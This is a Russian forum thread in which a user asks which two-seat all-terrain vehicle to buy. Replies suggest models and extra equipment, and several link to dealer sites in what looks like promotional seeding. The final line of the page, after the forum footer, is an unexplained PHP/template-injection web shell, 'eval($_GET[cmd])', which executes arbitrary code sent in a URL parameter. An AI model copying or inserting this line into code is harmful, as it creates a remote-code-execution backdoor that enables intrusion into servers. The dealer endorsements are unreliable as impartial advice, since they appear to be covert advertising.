+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Двухместный вездеход


  1. #1
    Мимо проходил Medved is on a distinguished road Аватар для Medved
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Гольф
    Сообщений
    42

    Двухместный вездеход

    С другом любим экстремальный отдых. Хотим вместе купить вездеход, чтобы ездить в походы и рыбалку в разные места, где нога человека не ступала. Какой вездеход посоветуете купить?

  2. #2
    Мимо проходил Benver is on a distinguished road Аватар для Benver
    Регистрация
    29.05.2020
    Откуда
    HРФ
    Машина
    мой
    Сообщений
    34
    Если я правильно понял, то вам нужен двухместный вездеход? Тогда можно приобрести отечественный вездеход Шатун Нео. Он двух местны, компактный и в нем два полноценных спальных места. И по цене он дешевле будет чем иностранные аналоги, но не уступит по своим характеристикам, которые можно тут посмотреть http://medved-avto.ru/ceny/vezdexod-...neo-perelomka/

  3. #3
    Мимо проходил Galvin is on a distinguished road Аватар для Galvin
    Регистрация
    28.05.2020
    Откуда
    РФ
    Машина
    GTI
    Сообщений
    29
    Внимательно перед покупкой прочитайте только что в базовую комплектацию входит и обязательно закажите дополнительное оборудование. Например, не будет лишней встроенная лебедка 4Revo TRX 9000

  4. #4
    Мимо проходил Харксрен is on a distinguished road Аватар для Харксрен
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    GTI
    Сообщений
    33
    Одной базовой комплектации будет мало. Учитывайте в каких условиях будет эксплуатировать вездеход и заказывайте дополнительное оборудование исходя из этого. Но его можно купить и потом конечно же.

  5. #5
    Мимо проходил Тунгус is on a distinguished road Аватар для Тунгус
    Регистрация
    28.05.2019
    Сообщений
    40
    А я у нас в СПб смотрел вот такие мотовездеходы https://motopole.ru/catalog/tekhnika...otovezdekhody/. Как вам? Мне кажется, для ваших целей это то, что нужно, на рыбалку, охоту можно ездить на таком. Они как раз на двоих пассажиров рассчитаны. Я бы себе тоже такой хотел купить, но средства пока не позволяют, а так вещь мировая, конечно

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    тоже нужны варианты, куда обратиться?

  7. #7
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Тоже нужно было подобрать надёжный вездеход, который бы и по стоимости оптимально обошёлся, и прослужил долго, так как покупка, так или иначе, дорогостоящая. В итоге, присмотрели вездеход тут https://girtek.ru/ от гиртек, выбрали для сотрудничества эту фирму, так как они одни из самых популярных и надёжных по России, к тому же, на всё оборудование даётся гарантия, что немаловажно, таким образом не возникнет проблем с качеством.

+ Ответить в теме

Похожие темы

  1. Планирую продать вездеход
    от Trety в разделе Курилка
    Ответов: 5
    Последнее сообщение: 29.03.2023, 20:32
  2. Вездеход
    от Oxoxo в разделе Курилка
    Ответов: 6
    Последнее сообщение: 04.03.2023, 10:27

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}